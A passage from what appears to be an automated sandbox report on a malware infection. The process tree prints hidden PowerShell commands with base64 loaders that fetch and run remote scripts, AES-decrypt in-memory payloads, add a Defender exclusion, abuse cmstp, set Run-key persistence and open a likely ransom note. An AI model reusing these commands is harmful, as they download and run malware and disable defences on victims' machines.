1wnICsgJG1mYSArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGJrb2xhOyR0dW1hbT1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGJrb2xhKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkYWVmIGluICR0dW1hbSkgewlpZiAoJGFlZi5TdGFydHNXaXRoKCc6OicpKQl7CQkkZmhuZnY9JGFlZi5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kcWN0YmY9W3N0cmluZ1tdXSRmaG5mdi5TcGxpdCgnXCcpO0lFWCAnJGNtY3h5PWJzaGNnICh3cXVzdSAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRxY3RiZlswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRoY3ZoYz1ic2hjZyAod3F1c3UgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkcWN0YmZbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7eGZvb3cgJGNtY3h5ICRudWxsO3hmb293ICRoY3ZoYyAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | Invoke-Expression"
                                                4⤵
                                                • Blocklisted process makes network request
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops startup file
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5572
                                        • C:\Windows\System32\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BL32_3001_Nany.vbs"
                                          1⤵
                                          • Checks computer location settings
                                          PID:6104
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
                                            2⤵
                                              PID:5188
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
                                                3⤵
                                                  PID:5280
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
                                                    4⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3588
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1erceo3g\1erceo3g.cmdline"
                                                      5⤵
                                                        PID:5628
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES184A.tmp" "c:\Users\Admin\AppData\Local\Temp\1erceo3g\CSC6E001B1717BC402D97196716B1F53D18.TMP"
                                                          6⤵
                                                            PID:5692
                                                        • C:\windows\system32\cmstp.exe
                                                          "C:\windows\system32\cmstp.exe" /au C:\windows\temp\tj3z1roo.inf
                                                          5⤵
                                                            PID:3152
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
                                                          4⤵
                                                          • Adds Run key to start application
                                                          PID:6044
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gZ3JncWFxeGR2Y3Jyam16amJxbHBvbGRhemd5dmNpbWdkdmN4YnJ4YSgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJzE1R3lXbVYvWHlmaFFwVUM0bHJGR0dER0pjMnNhcmRETWdJSjNhTlZEb1U9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCdtSUg3K2lMdXROWGhKR2MyT2k2N0R3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIG92dWFxa25ycnJranhoenZvZ3J0c2NibXFrbm9rYmhrdGxhdHFjam8oJHBhcmFtX3Zhcil7CUlFWCAnJHNnZGx4Y2p3d2hqdnpkaWx0aGtmeHpocGs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckYXBtZ2dlbHdjYmx6cXBuYnFzY3Nsa3BkcD1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJHppcmRydHpuYnhtd3FwZHh6d2N4bGRzeGU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkc2dkbHhjand3aGp2emRpbHRoa2Z4emhwaywgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkemlyZHJ0em5ieG13cXBkeHp3Y3hsZHN4ZS5Db3B5VG8oJGFwbWdnZWx3Y2JsenFwbmJxc2NzbGtwZHApOwkkemlyZHJ0em5ieG13cXBkeHp3Y3hsZHN4ZS5EaXNwb3NlKCk7CSRzZ2RseGNqd3doanZ6ZGlsdGhrZnh6aHBrLkRpc3Bvc2UoKTsJJGFwbWdnZWx3Y2JsenFwbmJxc2NzbGtwZHAuRGlzcG9zZSgpOwkkYXBtZ2dlbHdjYmx6cXBuYnFzY3Nsa3BkcC5Ub0FycmF5KCk7fWZ1bmN0aW9uIG5iZ2lhZGNtZHVtcWFqam9paXhxbXpwZGhieGVyYW1handvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckaGhleHlwYWlxZ3Z1c2xobG1vcmFlemN6dW1vbmdldnF1emtsdnFjaT1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJG1uYWlpZGdsdWx6b2F3emhmZmNtYm1jbWxlenRidnF3bWpvcXp0cnJmZHN1ZWdweXpjPSRoaGV4eXBhaXFndnVzbGhsbW9yYWV6Y3p1bW9uZ2V2cXV6a2x2cWNpLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJG1uYWlpZGdsdWx6b2F3emhmZmNtYm1jbWxlenRidnF3bWpvcXp0cnJmZHN1ZWdweXpjLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kb3F2cXJoaXdsb25rcHhib2N6ZXJrY3RsdCA9ICRlbnY6VVNFUk5BTUU7JHlkZW9ueWpvZ3ZibHNzZXluaHpydWJubm8gPSAnQzpcVXNlcnNcJyArICRvcXZxcmhpd2xvbmtweGJvY3plcmtjdGx0ICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkeWRlb255am9ndmJsc3NleW5oenJ1Ym5ubzskZGZkY3I9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCR5ZGVvbnlqb2d2Ymxzc2V5bmh6cnVibm5vKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdGdtIGluICRkZmRjcikgewlpZiAoJHRnbS5TdGFydHNXaXRoKCc6OicpKQl7CQkkd3Bxemo9JHRnbS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kcXF5YXloYnNnaWlpa2FleWhuaWFodm9nZmdmeXZ2cXdtbHk9W3N0cmluZ1tdXSR3cHF6ai5TcGxpdCgnXCcpO0lFWCAnJHZjYmhxa29lb2FuanFteHRoeXh0dWNydXJiY3hsc213emJqPW92dWFxa25ycnJranhoenZvZ3J0c2NibXFrbm9rYmhrdGxhdHFjam8gKGdyZ3FhcXhkdmNycmptempicWxwb2xkYXpneXZjaW1nZHZjeGJyeGEgKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkcXF5YXloYnNnaWlpa2FleWhuaWFodm9nZmdmeXZ2cXdtbHlbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckd2dmc3BzcWFmcndwbXhiaXhvcmVza2hwb2hydHdvcmtvY2I9b3Z1YXFrbnJycmtqeGh6dm9ncnRzY2JtcWtub2tiaGt0bGF0cWNqbyAoZ3JncWFxeGR2Y3Jyam16amJxbHBvbGRhemd5dmNpbWdkdmN4YnJ4YSAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRxcXlheWhic2dpaWlrYWV5aG5pYWh2b2dmZ2Z5dnZxd21seVsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtuYmdpYWRjbWR1bXFhampvaWl4cW16cGRoYnhlcmFtYWp3byAkdmNiaHFrb2VvYW5qcW14dGh5eHR1Y3J1cmJjeGxzbXd6YmogJG51bGw7bmJnaWFkY21kdW1xYWpqb2lpeHFtenBkaGJ4ZXJhbWFqd28gJHdnZnNwc3FhZnJ3cG14Yml4b3Jlc2tocG9ocnR3b3Jrb2NiICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
                                                          4⤵
                                                          • Blocklisted process makes network request
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3412
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
                                                    1⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Drops file in System32 directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2516
                                                  • C:\Windows\system32\taskkill.exe
                                                    taskkill /IM cmstp.exe /F
                                                    1⤵
                                                    • Kills process with taskkill
                                                    PID:5880
                                                  • C:\Windows\system32\NOTEPAD.EXE
                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\266643fa11b143499bfb26efabe76bab.txt
                                                    1⤵
                                                    • Opens file in notepad (likely ransom note)
                                                    PID:7056
                                                  • C:\Windows\System32\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\ALLINBIN.vbs"
                                                    1⤵
                                                    • Checks computer location settings
                                                    PID:6480
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
                                                      2⤵
                                                        PID:6424
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
                                                          3⤵
                                                            PID:6356
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
                                                              4⤵
                                                              • Blocklisted process makes network request
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:6320
                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mdyuplhz\mdyuplhz.cmdline"
                                                                5⤵
                                                                  PID:7276
                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES24E8.tmp" "c:\Users\Admin\AppData\Local\Temp\mdyuplhz\CSCBA14C1886AB74D05814A76CACF316A92.TMP"
                                                                    6⤵
                                                                      PID:7236
                                                                  • C:\windows\system32\cmstp.exe
                                                                    "C:\windows\system32\cmstp.exe" /au C:\windows\temp\k2yaupfo.inf
                                                                    5⤵
                                                                      PID:6692
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
                                                                    4⤵
                                                                    • Adds Run key to start application
                                                                    PID:5300
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gdXRnZHZ5aXFqbGxicWR5dW9ncXRncXVtdGxzdXhwZnVuZGVtdmFtbSgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1krRTNPTFNyRXRCRTZuaVd2K1kxdGVaRkEvUlJxcjlDem9hNlY3WVYveDA9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCdOR1JZb3A4RDRqUGdIN3psSTJ2OFVRPT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIHJ2Y3Fucmd2Y2Jxc2d5ZWR5dWtrZm5zdGdxb216bXludGVjbG9leWIoJHBhcmFtX3Zhcil7CUlFWCAnJGV4c3Z6bW9vemJuYnBiZ2RjaWp3ZHV3cWM9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckY3pid3NvdXZqZ2l2d3V0YmFteHl4eXJ5eT1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGpndWN5a2JidHhubnJnbnRnZ3Z4aWZvcXU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkZXhzdnptb296Ym5icGJnZGNpandkdXdxYywgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkamd1Y3lrYmJ0eG5ucmdudGdndnhpZm9xdS5Db3B5VG8oJGN6Yndzb3V2amdpdnd1dGJhbXh5eHlyeXkpOwkkamd1Y3lrYmJ0eG5ucmdudGdndnhpZm9xdS5EaXNwb3NlKCk7CSRleHN2em1vb3pibmJwYmdkY2lqd2R1d3FjLkRpc3Bvc2UoKTsJJGN6Yndzb3V2amdpdnd1dGJhbXh5eHlyeXkuRGlzcG9zZSgpOwkkY3pid3NvdXZqZ2l2d3V0YmFteHl4eXJ5eS5Ub0FycmF5KCk7fWZ1bmN0aW9uIHNjd2xuaHJ3dHVkcmZveWZjZWlrYWxsYnp0d3pid2V5eHNrKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckY2h5cmZlaGN5amh6dGt3aHRkd2dvaWZqZXJyd2FwZHNlaHZjY2tudD1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGZrc3hmdW13enFvYnJqZ3Rjb21vbWxiaWdwdW1vdWVqcGRhZHFpZGtldndqYmNhdWFiPSRjaHlyZmVoY3lqaHp0a3dodGR3Z29pZmplcnJ3YXBkc2VodmNja250LkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGZrc3hmdW13enFvYnJqZ3Rjb21vbWxiaWdwdW1vdWVqcGRhZHFpZGtldndqYmNhdWFiLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kdm5rb2t3ZmphbXR2dHBmbmVhdml2bWVsdSA9ICRlbnY6VVNFUk5BTUU7JGxnYWJzZ3JmYmN4cHVqbHZjY2Znb3Bsa2MgPSAnQzpcVXNlcnNcJyArICR2bmtva3dmamFtdHZ0cGZuZWF2aXZtZWx1ICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbGdhYnNncmZiY3hwdWpsdmNjZmdvcGxrYzskYnhodng9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRsZ2Fic2dyZmJjeHB1amx2Y2NmZ29wbGtjKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaWprIGluICRieGh2eCkgewlpZiAoJGlqay5TdGFydHNXaXRoKCc6OicpKQl7CQkkd3ZxenI9JGlqay5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kaXVpeWJmc2Nra3liYXpsbHVseHhieWFnbGtvYmtzcGNnZm49W3N0cmluZ1tdXSR3dnF6ci5TcGxpdCgnXCcpO0lFWCAnJGtneHZndXp4eWFzbmJjeXBzbm9vanRjbnJycXJzdnZ1dm1iPXJ2Y3Fucmd2Y2Jxc2d5ZWR5dWtrZm5zdGdxb216bXludGVjbG9leWIgKHV0Z2R2eWlxamxsYnFkeXVvZ3F0Z3F1bXRsc3V4cGZ1bmRlbXZhbW0gKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkaXVpeWJmc2Nra3liYXpsbHVseHhieWFnbGtvYmtzcGNnZm5bMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckZXdwcWNiYmNmdHdueW1kd3BzcWRxZWtlcGRoZWNleHNvYnQ9cnZjcW5yZ3ZjYnFzZ3llZHl1a2tmbnN0Z3FvbXpteW50ZWNsb2V5YiAodXRnZHZ5aXFqbGx